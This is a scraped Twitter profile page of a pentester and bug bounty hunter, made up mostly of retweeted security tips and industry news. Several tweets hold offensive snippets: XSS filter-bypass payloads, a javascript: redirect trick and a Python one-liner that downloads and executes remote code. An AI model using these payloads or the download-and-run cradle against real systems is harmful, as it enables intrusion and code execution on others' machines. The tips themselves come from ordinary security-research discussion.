Nate

@n8zwn

Family Life, Information Security and Assurance, Pentesting, Vulnerability Discovery, Outdoors

SLC, Utah
Vrijeme pridruživanja: ožujak 2009.

Tweetovi

Blokirali ste korisnika/cu @n8zwn

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @n8zwn

  1. proslijedio/la je Tweet
    2. velj

    This month I learnt how to analyse the JavaScript of a React Native application while bounty hunting. I wanted to share what I found out with everyone else.

    Poništi
  2. proslijedio/la je Tweet
    31. sij

    I've been beta testing this update for a while, it's a good one :)

    Poništi
  3. proslijedio/la je Tweet
    23. sij

    For a stealthier usage, tick "Proxy > Options > Miscellaneous > Disable web interface"

    Poništi
  4. proslijedio/la je Tweet
    24. sij

    Excited to officially announce The Syndicate, our 4-person live hacking team. We are kicking off the year in San Francisco at . We will be donating 5% of all live event earnings to charity and 5% of our time to volunteering for all of 2020 and beyond.

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    26. sij

    An excellent talk by : clear methodology, novel bugs and interesting links 💯

    Poništi
  6. proslijedio/la je Tweet
    26. sij

    GET /example?param=test .. nothing interesting happened, not vuln to XSS. (<> " was filtered) but if I change it to POST it's reflected as value=\"test\" POST /example#xss param=test+onfocus='alert(0)'id='xss' ..and I can haz XSS bypassing their 'filter'

    Poništi
  7. proslijedio/la je Tweet
    25. sij

    time: combine Arjun from with BurpIntuder to bruteforce parameter values. I once got "?debug" as a valid parameter and got "on" as a good value which disclosed juicy information helping me chain bugs to a P1. Final: "?debug=on" RT & L

    Poništi
  8. proslijedio/la je Tweet
    24. sij

    Python equivalent of PowerShell IEX cradle: python -c 'import urllib2;r=urllib2.urlopen("");exec(())' Let me know if anyone has a better way to do it, but this seems to work.

    Poništi
  9. proslijedio/la je Tweet
    23. sij

    I was bored and felt like sharing.. So I launched an "Instagram Live" session and pushed record. The session lasted roughly for an hour and contained about 28 questions and 35+ of my answers. Heres the "Directors Cut" trimmed for your pleasure.

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    22. sij

    Everyone likes free training. Right? The Adversary Tactics: Powershell course has been retired from SpecterOps delivery. The course material has been made public.

    Poništi
  11. proslijedio/la je Tweet
    22. sij

    "We must use time as a tool, not as a crutch."

    Poništi
  12. proslijedio/la je Tweet
    29. pro 2019.

    2020 - Pay 6,000,613 USD in rewards - Celebrate 10 year anniversary - Meet more Bug Hunters!

    Poništi
  13. proslijedio/la je Tweet
    16. sij

    So you believe UUID's are a sufficient protection against IDOR's? Think again! 🤦 Thanks for the ,

    Poništi
  14. proslijedio/la je Tweet
    10. sij

    Just got laid off. 5+ years at Bugcrowd. What a journey I will need help finding something new. Guess 2020 will be the start of something by different Really tough day for me

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    12. sij

    Just posted Remote Code Execution in Three Acts: Chaining Exposed Actuators and H2 Database Aliases in Spring Boot 2. Using a payload containing three different programming languages :)

    Poništi
  16. proslijedio/la je Tweet
    12. sij

    New series spoilers 🤐

    Poništi
  17. proslijedio/la je Tweet
    14. sij

    Back to blogging! CSRF-protected forms, Intruder, and no macros. A step-by-step walkthrough based on that you can follow along at home...

    Poništi
  18. proslijedio/la je Tweet
    9. sij

    Responder 3.0.0.0 is out! Massive upgrade, support for both py3 and py2, many bug fix, enhancements and Q.A++ on all servers, poisoners and tools. Enjoy! ;)

    Poništi
  19. proslijedio/la je Tweet
    13. sij

    When using as part of your arsenal, make sure to add --data-length=50 {or any number in 20~60, the TCP packet header size). Otherwise, Nmap will in many cases return False Positives (i.e. too many open ports, or ports that are not actually open).

    Prikaži ovu nit
    Poništi
  20. proslijedio/la je Tweet
    13. sij

    While pentesting webapps, whenever you notice a redirect, check what caused it. If it's a client side redirect (caused by JavaScript), try redirecting to javascript:alert(), now you have XSS!

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·